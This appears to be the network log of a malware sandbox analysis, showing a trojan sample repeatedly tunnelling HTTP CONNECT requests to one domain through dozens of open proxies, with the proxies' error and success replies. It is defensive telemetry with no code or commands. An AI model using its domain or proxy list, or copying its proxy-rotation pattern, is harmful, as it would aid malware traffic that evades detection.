                                                                                Feb 23, 2024 14:28:35.194894075 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.288928032 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:44.289060116 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:56.288464069 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1230192.168.2.853690104.21.223.181805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.052290916 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.148838043 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:32 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1231192.168.2.85349974.119.147.20941455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.052521944 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1232192.168.2.85155551.15.139.59163795828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.063296080 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.249839067 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1233192.168.2.85326672.37.216.6841455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.104341030 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1234192.168.2.853699159.223.166.21455375828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.105925083 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.492024899 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.991909027 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.679617882 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.882662058 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.195116997 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.492090940 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.992223978 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:44.991967916 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1235192.168.2.853531187.210.136.8841535828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.124186039 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1236192.168.2.85292192.246.139.112100085828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.173727989 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.194936991 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.288784027 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:44.289325953 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:56.304256916 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:08.319809914 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1237192.168.2.853668107.148.98.224583945828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.186429024 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.991916895 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.456137896 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1238192.168.2.853713172.67.14.237805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.193649054 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.282944918 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:32 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1239192.168.2.853333135.181.55.8131285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.204554081 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1240192.168.2.853675154.12.178.107299855828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.208152056 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1241192.168.2.85370245.11.95.16560495828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.208152056 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.898055077 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.615804911 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1242192.168.2.853673202.131.159.5856785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.208512068 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1243192.168.2.853703176.120.32.13556785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.220904112 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1244192.168.2.85335142.61.48.21980005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.229398966 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.382762909 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.492230892 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:44.720675945 CET74INHTTP/1.1 200 OK
                                                                                date: Fri, 23 Feb 2024 13:08:49 GMT
                                                                                server: svcproxy


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1245192.168.2.85370845.43.83.18864715828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.232413054 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.474493980 CET459INHTTP/1.1 407 Proxy Authentication Required
                                                                                Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization."
                                                                                Proxy-Connection: close
                                                                                X-Webshare-Error: 407
                                                                                X-Webshare-Reason: invalidpassword
                                                                                Date: Fri, 23 Feb 2024 13:28:32 GMT
                                                                                Content-Length: 121
                                                                                Content-Type: text/plain; charset=utf-8
                                                                                Connection: close
                                                                                Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e
                                                                                Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1246192.168.2.8535291.15.62.1256785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.247092962 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1247192.168.2.853709109.69.0.17956785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.266535044 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1248192.168.2.853087103.148.51.1980805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.270505905 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1249192.168.2.853089139.99.35.19511805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.295855999 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.398092985 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.492150068 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1250192.168.2.853133103.115.255.106363315828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.318442106 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1251192.168.2.853174132.148.154.98509655828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.333251953 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.382905006 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.492259979 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:44.492295027 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:56.491578102 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:08.491611958 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:20.493098974 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1252192.168.2.851619104.238.111.107602145828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.345973969 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.382962942 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.492242098 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:44.492290974 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:56.491607904 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:20.491589069 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1253192.168.2.853758172.67.181.97805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.364411116 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.451282024 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:32 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1254192.168.2.85372774.48.78.52805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.379597902 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.040780067 CET836INHTTP/1.1 500 Internal Server Error
                                                                                Date: Fri, 23 Feb 2024 13:28:35 GMT
                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                Content-Length: 644
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
